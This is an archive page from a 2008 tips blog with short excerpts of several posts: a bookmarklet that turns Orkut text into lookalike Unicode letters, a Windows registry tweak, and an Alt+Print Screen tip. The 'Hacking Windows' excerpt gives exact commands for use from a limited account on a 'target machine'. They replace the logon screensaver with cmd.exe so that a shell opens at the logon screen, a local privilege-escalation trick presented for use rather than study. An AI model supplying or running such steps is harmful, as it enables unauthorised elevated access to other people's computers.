Articles Archive for August 2008
Orkut Hacking »
Wαит тσ wяiтє likє тнiร???
Follow the Simple Steps Below
(1)CLICK σи REPLY
(2)write anything in the box
(3)ραSтє тнє FσLLσWIиG SCяIρт Iи αDDяєรร Bαя(Wнєяє Yσυ WяIтє тнє αDDяєรร σF тнє WєBSIтєร)
(4)нIт єитєя
(5)CLICK σи SυBмIт
javascript:var txt=document.getElementsByTagName(‘textarea’) [0];txt.value=txt.value.replace(/a/gi,”α”); txt.value=txt.value.replace(/p/gi,”ρ”);txt.value=txt.value.replace(/N /gi,”и”);txt.value=txt.value.replace(/t/gi,”т”); txt.value=txt.value.replace(/E/gi,”є”);txt.value=txt.value.replace(/u /gi,”υ”);txt.value=txt.value.replace(/h/gi,”н”); txt.value=txt.value.replace(/s/gi,”ร”);txt.value=txt.value.replace(/o /gi,”σ”);txt.value=txt.value.replace(/m/gi,”м”);txt.value=txt.value.replace(/r/gi,”я”);void(0);
Hacking Windows »
If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get …
Cool Tricks, Hacking Windows »
1. Click on Start button and type “Regedit” in Run option.
2. Here locate to :HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\UnreadMail
3. In right side panel, double click on the key MessageExpiryDays and set its value to 0.
4. If MessageExpiryDays key doesn’t exist, then in right side panel, click right to create a key with the nameMessageExpiryDays and then set its value to 0.
Now close the registry editor and restart your computer after any changes to go into effect.
Cool Tricks, Hacking Windows, Linux Unix Hacking »
Common knowledge on using the Print Screen (at least for me) is that you just press the Print Screen key and paste whatever it is shown on your screen to a graphics editor like Paint, right? This suits you if you intend to print screen the entire screen. But what if you only want to print screen one window? There is a way!
Let me demonstrate:
Step 1 : Activate the desired window to print screen. For this purpose, I made the calculator window active.
Step 2 : Press Alt + Print Screen …
